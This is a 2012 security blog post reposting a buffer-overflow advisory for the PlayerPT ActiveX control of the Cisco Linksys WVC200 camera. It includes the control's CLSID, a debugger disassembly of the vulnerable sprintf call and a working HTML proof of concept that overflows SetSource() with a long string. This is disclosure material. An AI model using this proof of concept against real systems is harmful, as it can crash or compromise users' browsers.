Mar
22
2012
22
2012
Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera buffer overflow
An article by Fabio Semperboni Exploit
The Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT ActiveX Control PlayerPT.ocx auffers a buffer overflow vulnerability.
When viewing the device web interface it asks to install an ActiveX control with the following settings:
ProductName: PlayerPT ActiveX Control Module
File version: 1.0.0.15
Binary path: C:\WINDOWS\system32\PlayerPT.ocx
CLSID: {9E065E4A-BD9D-4547-8F90-985DC62A5591}
ProgID: PLAYERPT.PlayerPTCtrl.1
Safe for scripting (registry): True
Safe for initialization (registry): True
Vulnerability (Only for test):
the SetSource() method is vulnerable to a buffer overflow vulnerability. Quickly, ollydbg dump:
...
03238225 8B5424 20 mov edx,dword ptr ss:[esp+20]
03238229 894424 10 mov dword ptr ss:[esp+10],eax
0323822D B9 32000000 mov ecx,32
03238232 33C0 xor eax,eax
03238234 8B72 F8 mov esi,dword ptr ds:[edx-8]
03238237 8DBC24 E8020000 lea edi,dword ptr ss:[esp+2E8]
0323823E F3:AB rep stos dword ptr es:[edi]
03238240 8B3D 0C062603 mov edi,dword ptr ds:[<&MSVCRT.sprintf>] ; msvcrt.sprintf
03238246 52 push edx
03238247 8D8C24 EC020000 lea ecx,dword ptr ss:[esp+2EC]
0323824E 68 48612603 push PlayerPT.03266148 ; ASCII "%s"
03238253 51 push ecx
03238254 FFD7 call edi <---------------boom
...
rgod
-->
<!-- saved from url=(0014)about:internet -->
<HTML>
<object classid='clsid:9E065E4A-BD9D-4547-8F90-985DC62A5591' id='obj' />
</object>
<script>
var x="";
for (i=0; i<13999; i++){
x = x + "aaaa";
}
obj.SetSource("","","","",x);
</script>
References: http://www.exploit-db.com/exploits/18641/
Tags: Buffer overflows, Linksys
Related Posts
- Senior Executives Say Cloud-Based Collaboration Leads to Higher Business Performance http://t.co/mG2W0O7z88
- Telefonica and Cisco Complete 4,000 kilometer 100Gbps IPoDWDM Trial http://t.co/7c0uqzH6bG
- Mozilla Releases Multiple Updates http://t.co/Kqldpe1MZ7
Email Updates
Archives
- May 2013
- April 2013
- March 2013
- February 2013
- December 2012
- November 2012
- October 2012
- September 2012
- August 2012
- July 2012
- June 2012
- May 2012
- April 2012
- March 2012
- February 2012
- December 2011
- November 2011
- October 2011
- September 2011
- August 2011
- July 2011
- June 2011
- May 2011
- April 2011
- March 2011
- February 2011
- January 2011
- December 2010
- November 2010
- October 2010
- September 2010
- July 2010
- June 2010
- May 2010
- April 2010
- March 2010
- February 2010
- January 2010
- December 2009
- November 2009
- October 2009
- September 2009
- August 2009
- July 2009
- June 2009
- May 2009
- April 2009
- March 2009
- February 2009
- January 2009
- December 2008
- November 2008
- October 2008
- September 2008

